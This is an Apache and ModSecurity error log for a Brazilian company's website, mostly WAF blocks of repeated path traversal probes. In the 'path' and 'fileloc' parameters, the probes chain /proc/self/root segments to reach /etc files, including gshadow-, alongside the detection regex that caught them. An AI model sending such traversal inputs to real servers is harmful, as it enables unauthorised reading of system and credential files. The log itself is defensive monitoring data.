[Wed Mar 18 15:40:54.954763 2026] [core:alert] [pid 15051:tid 140411557287680] [client 74.7.241.31:47532] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Wed Mar 18 15:41:00.136349 2026] [mime_magic:error] [pid 30077:tid 140411540502272] (70014)End of file found: [client 57.141.18.1:55316] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:04.308101 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:47546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxwAkwaGbbGflqUZBHvQAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:41:12.705212 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:52860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrxyAkwaGbbGflqUZBHxQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:41:22.251489 2026] [mime_magic:error] [pid 31803:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:48432] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:22.251889 2026] [access_compat:error] [pid 31803:tid 140411683178240] [client 216.73.216.191:48432] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 15:41:29.718749 2026] [:error] [pid 14269:tid 140411708356352] [client 216.73.216.191:41212] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrx2QbLMZ6AikZjR9X0AAAAAAQ"]
[Wed Mar 18 15:41:34.830363 2026] [mime_magic:error] [pid 17887:tid 140411733534464] (70014)End of file found: [client 57.141.18.105:56496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:45.167769 2026] [mime_magic:error] [pid 15826:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:59728] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:45.167784 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 57.141.18.11:56872] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:45.167797 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:7495] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:45.167787 2026] [mime_magic:error] [pid 15051:tid 140411674785536] (70014)End of file found: [client 74.7.243.128:46252] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/include
[Wed Mar 18 15:41:45.167876 2026] [access_compat:error] [pid 15826:tid 140411658000128] [client 216.73.216.191:59728] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 15:41:45.167913 2026] [access_compat:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:7495] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 15:41:45.168013 2026] [access_compat:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:46252] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/include
[Wed Mar 18 15:41:45.168160 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 57.141.18.120:56896] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:55.082248 2026] [:error] [pid 29882:tid 140411557287680] [client 216.73.216.191:11056] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrx8kzinOy1jxa1j4dSQAAAARY"]
[Wed Mar 18 15:41:59.241930 2026] [mime_magic:error] [pid 31803:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:56754] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:41:59.242291 2026] [access_compat:error] [pid 31803:tid 140411691570944] [client 216.73.216.191:56754] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 15:42:00.259347 2026] [:error] [pid 14269:tid 140411599251200] [client 216.73.216.191:33035] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrx-AbLMZ6AikZjR9X0JgAAABE"]
[Wed Mar 18 15:42:03.763309 2026] [:error] [pid 29882:tid 140411548894976] [client 216.73.216.191:43572] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrx-0zinOy1jxa1j4dSTwAAARc"]
[Wed Mar 18 15:42:15.842594 2026] [:error] [pid 17653:tid 140411741927168] [client 216.73.216.191:64670] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryBsdf6f5d65gmYZQKWQAAAsA"]
[Wed Mar 18 15:42:26.646234 2026] [mime_magic:error] [pid 30077:tid 140411548894976] (70014)End of file found: [client 57.141.18.67:58912] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:43:24.453425 2026] [:error] [pid 31803:tid 140411632822016] [client 216.73.216.191:27066] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryS-yqAr6etmhZHNr-fgAAAE0"]
[Wed Mar 18 15:43:25.406792 2026] [:error] [pid 14269:tid 140411641214720] [client 216.73.216.191:23891] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryTQbLMZ6AikZjR9X0vQAAAAw"]
[Wed Mar 18 15:43:29.502963 2026] [:error] [pid 14269:tid 140411733534464] [client 216.73.216.191:26604] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryUQbLMZ6AikZjR9X0wgAAAAE"]
[Wed Mar 18 15:43:29.705268 2026] [:error] [pid 31803:tid 140411607643904] [client 216.73.216.191:9127] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryUeyqAr6etmhZHNr-hQAAAFA"]
[Wed Mar 18 15:43:36.835627 2026] [:error] [pid 31803:tid 140411540502272] [client 216.73.216.191:46019] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryWOyqAr6etmhZHNr-igAAAFg"]
[Wed Mar 18 15:43:37.515159 2026] [:error] [pid 29882:tid 140411658000128] [client 216.73.216.191:3386] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryWUzinOy1jxa1j4dSsAAAAQo"]
[Wed Mar 18 15:44:14.907822 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:54686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryfimAPhZkrhU8w4mfwwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:14.910649 2026] [:error] [pid 31803:tid 140411590858496] [client 216.73.216.191:14131] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryfuyqAr6etmhZHNr-tAAAAFI"]
[Wed Mar 18 15:44:18.175023 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:35500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryggbLMZ6AikZjR9X02AAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:22.557503 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:35504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryhgkwaGbbGflqUZBIaAAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:26.289262 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:35508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryigbLMZ6AikZjR9X03QAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:32.378886 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:43294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abryjymAPhZkrhU8w4mfywAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:39.083224 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:42600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrylwkwaGbbGflqUZBIbQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:44:44.110248 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.244.43:40306] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrynEzinOy1jxa1j4dS4wAAAQg"]
[Wed Mar 18 15:44:46.192118 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.228.61:42052] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrynfu8EFLIOrSqIps2FAAAAlQ"]
[Wed Mar 18 15:44:46.192401 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:42610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrynQkwaGbbGflqUZBIcQAAANA"], referer: 